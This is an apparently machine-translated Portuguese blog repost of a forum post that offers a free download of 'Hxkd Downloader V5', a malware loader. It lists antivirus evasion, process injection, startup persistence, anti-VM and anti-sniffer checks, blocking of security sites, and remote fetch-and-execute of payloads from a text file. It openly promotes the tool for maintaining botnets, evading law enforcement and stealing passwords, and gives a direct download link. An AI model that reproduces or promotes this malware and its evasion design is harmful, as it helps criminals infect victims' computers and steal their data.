Tecnologia do Blogger.

Arquivo do blog

Publicidade

Downloader Hxkd de V5

Downloader Hxkd de V5
« em: Ontem às 10:32:28 »
Hey pessoas

Eu estava vendendo este um tempo atrás e eu fiz um lucro, então agora eu vou liberá-lo gratuitamente para todos. Eu estava inspirado para continuar a fazer estes cada vez que eu fiz esse primeiro que foi um sucesso.

Screen Shot:


Vídeo:

Por favor note, meu parceiro de negócios também é mostrar como alguns dos meus trabalhos outros produtos.

[YT] http://www.youtube.com/watch?v=K8burni-HYQ [/ YT]

Download:
http://rapidshare.com/files/433675785/Hxkd_s_Downloader_V5.zip

Características:

FUD
Tiny tamanho do arquivo (a partir de 22KB)
Secretaria Start-up
Injectar Processo *
Executar ou injetar processo
Botão Atualizar
Mantém o seu servidor real FUD por mais tempo (não precisa de um Crypter novamente! Uma vez que é FUD, FUD ele vai ficar para sempre!)
Permanece FUD meses
Stubs URL criptografados, bem como outras informações importantes
processo escolheria para injetar nos
Antis: Sandboxie WireShark, AntiVMWare
Bloco site personalizado
Testado em XP, Vista, Seven 32/64 Bit
Bloquear todos os sites scanner principais
Recursos do sistema de baixa
Autorun servidor de arquivos downloader
Autorun arquivo baixado
Qualquer surgestions será adicionado nas atualizações de software!
Fixe novamente crackers
Kill protecção Palavra (método hxkd de proteção único)
Não APIs (isso irá aumentar o tempo que o produto permaneça FUD)
 * Hot * característica única:. Verifica um site de arquivo txt, e quando houver uma URL que faz o download e executa-lo no computador dos clientes!

Injectar * só funciona no XP e Vista 32 Bits. Ele irá funcionar em todos os 32 bits e 64 bits Oses após primeira atualização. Além disso, alguns processos não podem ser capazes de ser injetado.


Ainda agora se você quer isso? Pergunte-se:

- Você está doente e cansado de gastar tempo, dinheiro e tempo novamente na Crypters tornando seus arquivos FUD? Então ele te irritar quando eles se tornam detectado e você perde um monte de robôs? Bem, já que isto faz o download do seu servidor que irá mantê-lo sempre FUD. A única coisa que é detectado depois de um longo tempo é o AutoDownloader, que é muito mais barato que um Crypter, e ainda tem uma vida útil opção de atualização Stub. Então, posso garantir que você nunca vai precisar de um Crypter novamente!

- Você não consegue encaminhar a porta, mas você quer robôs? Ou, se você apenas cicatrizes de ter o FEDs chegar a sua casa e lhe enviando para a prisão, ou dando-lhe uma multa que não pode pagar? Bem, não se preocupe mais! Tudo que você precisa fazer é enviar o Downloader para seus clientes e, em seguida, quando você quer vender sua bots, basta digitar a URL dos compradores bot download em um arquivo txt. Em seu site e vai baixá-lo sem dor e até mesmo injetá-lo no processo que você escolheu! Isso não só torna FUD, mas vai mesmo manter os bots processo oculto!

- Você está cansado de perder bots desde maioria dos ratos são inúteis, ou o seu servidor de IRC desce? Bem, com este Downloader, que vai baixar novamente o arquivo, assim você nunca perderá um escravo outra vez! Ou, você pode mesmo fazê-lo continuar a baixar arquivos diferentes e, em seguida, adicioná-los ao start-up. Muitos programas importantes como Ladrões não têm uma opção de arranque. Isso não é bom se você está tentando roubar a senha de alguém sem um Keylogger é?

Se você respondeu "sim" ou mesmo "não" a qualquer das perguntas e respostas acima, estou certo de que este programa é ideal para você


Créditos:
Hxkd, Nathan, Nova Hits, [G], 0x1a


Espero que todo mundo gosta de presente e deixa comentários justo. Se você usar isso, por favor, deixe os créditos para o meu perfil no HH.

hxkd

 
sprintrade network